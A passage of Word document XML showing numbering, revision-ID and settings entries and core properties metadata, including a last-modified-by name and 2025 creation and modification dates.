  </w:num>
  <w:num w:numId="5" w16cid:durableId="1478034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6D"/>
    <w:rsid w:val="000C2EF3"/>
    <w:rsid w:val="001D65CB"/>
    <w:rsid w:val="003261E0"/>
    <w:rsid w:val="00610DAD"/>
    <w:rsid w:val="00654C37"/>
    <w:rsid w:val="00885E6D"/>
    <w:rsid w:val="00A003DB"/>
    <w:rsid w:val="00CC4BA1"/>
    <w:rsid w:val="00D552D7"/>
    <w:rsid w:val="00D77FD5"/>
    <w:rsid w:val="00F8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0545"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B50C0414-D4ED-4A71-A972-9200A46F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E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E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E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E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E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E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E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E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E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E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9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1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a</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Rahgul Sudhakar</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-29T16:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-09T05:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>